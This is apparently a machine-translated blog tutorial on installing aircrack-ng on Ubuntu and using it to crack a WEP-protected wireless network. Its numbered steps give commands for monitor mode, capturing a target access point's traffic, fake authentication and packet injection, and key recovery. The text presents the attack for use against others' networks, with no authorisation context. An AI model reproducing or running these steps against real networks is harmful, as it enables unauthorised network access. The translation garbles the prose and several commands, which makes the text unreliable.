Ubuntu 12.04 installation and use of airtrack ng tutorial

The original address: http://www.maybe520.net/blog/1744/
wireless code 1 ` backtrack is the most appropriate, then from the U disk to start the backtrack system very convenient also 2 ` BT5 system in virtual machine to crack the password needed to external USB wireless network card 3 ` with ubuntu to crack password
and open a terminal, enter the following command to install it
sudo apt – get the install Aircrack-ng
first install two extensions
sudo apt-get install build-essential
sudo apt-get install libssl-dev then go to http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz to download the latest version of aircrack-ng, Unzip it

after saving, start compiling and installing
make
sudo make install

how to use ubuntu aircrack-ng to crack the wireless password?

ubuntu aircrack-ng use tutorial
1, start the monitoring mode of wireless network card, input: sudo airmon-ng start wlan0
(wlan0 is the port of wireless network card, can be viewed by ifconfig)
sudo airodump-ng mon0
(mon0 is the port of the wireless network after starting the monitoring mode)
to see which of the wep encrypted AP online, then press CTRL +c to stop, do not close the terminal. 3. Grab packet
open another terminal and input:
sudo airodump -ng-c 6 — bssid AP’s mac-w wep mon0 — br> (-c followed by 6 is the AP working channel to crack, -bissid followed by AP ‘sMAC is the MAC address of the AP to crack, -w followed by wep is the file name of the DATA packet captured and saved. Change the channel and MAC address according to the online AP in step 2. DATA, save the file name can literally) 4, establish the virtual connection with AP
to open a new terminal, input:
sudo aireplay – ng – 1 0 – a AP ‘s MAC – h My MAC mon0
(- h followed by My MAC is own wireless network card MAC address, namely the ifconfig command wlan0 under the corresponding MAC address) 5, after injection of
success to establish a virtual connection type:
sudo aireplay -ng-2-f-p 0841-c ff:ff:ff:ff:ff:ff: ff-b AP’s mac-h My MAC mon0
now look back to see if the terminal in step 3 is DATA starting to soar! 6, decrypt
collect more than 15,000 DATA, open another terminal, switch to aircrack-ng-1.1 directory, execute the following command
sudo aircrack-ng wep*. Cap
for decrypting
(if not calculated, continue to wait, aircrack-ng will automatically run again after every 15,000 more DATA is added, until the password is calculated as 7, stop work
after cracking the password, enter sudo airmon-ng stop mon0 in the terminal to close the monitoring mode, otherwise the wireless network card will always be injected to the AP just, CTRL +c to exit or directly close the terminal is not ok. If you want to uninstall aircrack-ng on ubuntu, you can switch to aircrack-ng-1.1 directory, execute
sudo make uninstall
and manually delete the directory and everything under it.

Read More: